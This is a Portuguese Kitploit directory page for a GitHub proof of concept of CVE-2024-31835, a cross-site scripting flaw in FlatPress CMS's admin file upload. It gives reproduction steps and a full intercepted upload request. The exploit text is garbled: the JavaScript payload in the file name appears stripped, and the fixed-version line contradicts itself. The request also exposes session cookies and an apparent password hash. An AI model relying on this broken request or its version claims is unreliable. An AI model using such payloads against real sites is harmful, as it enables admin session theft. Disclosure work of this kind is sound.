Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-31835 — Vulnerabilidade de Cross Site Scripting no flatpress CMS Flatpress v1.3 permite que um atacante remoto execute código arbitrário por meio de um payload forjado no parâmetro file name. | Kitploit
Ferramentas/GitHubGitHub/paragbagul111/cve-2024-31835
Análise de VulnerabilidadesAnálise de CódigoExploraçãoSegurança WebTestes de Penetração
GitHubparagbagul111/cve-2024-31835

CVE-2024-31835

Vulnerabilidade de Cross Site Scripting no flatpress CMS Flatpress v1.3 permite que um atacante remoto execute código arbitrário por meio de um payload forjado no parâmetro file name.

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-31835

Vulnerabilidade de Cross-Site Scripting no CMS FlatPress v1.3 permite que um atacante remoto execute código arbitrário por meio de um payload criado no parâmetro de nome de arquivo.

Componente afetado: Campo de upload de arquivos do painel de administração do FlatPress CMS

Versão corrigida: FlatPress v1.3 - será corrigido na versão 1.3 do FlatPress.

Tipo de ataque: Remoto

Vetores de ataque: Explorar a vulnerabilidade criando o nome do arquivo de imagem

Passos para reproduzir:

1.Faça login na conta de administrador e abra a URL abaixo http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader&action=mediamanager 2.Clique no campo de upload, envie qualquer arquivo que desejar, clique em upload e intercepte a requisição com o Burp Suite. A requisição será semelhante à abaixo; injete o payload JavaScript com o nome de arquivo testtest

Exemplo de Requisição

root@kitploit:~
POST /flatpress-1.2.1/admin.php?p=uploader&action=default HTTP/1.1
Host: 127.0.0.1
Content-Length: 1598
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHnyH0cX0ojRbqom
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-9b0a379a=parag; fppass_fp-9b0a379a=%242y%2410%24j.D1Ab.xVMoIDu9yQF8QjefOZmz9JPoh4QwzpoCdYxlqSkNQDGag2; fpsess_fp-9b0a379a=mg65h4rd8onvv2tniminpq635f
Connection: close

------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wpnonce"
60f24876be
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wp_http_referer"
/flatpress-1.2.1/admin.php?p=uploader
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="upload[]"; filename="test.phpuh9aeairjipc8brr"
Content-Type: application/x-php

TEst
------WebKitFormBoundaryzHnyH0cX0ojRbqom--

Referências:

https://portswigger.net/web-security/cross-site-scripting https://drive.google.com/file/d/1OthtP87MduNTYur_p0RZv3moY8CrBcaM/view

Fornecedor do produto: FlatPress CMS

Confirmado em: 11/06/2023

Descobridor: Parag Bagul

Baixar ferramenta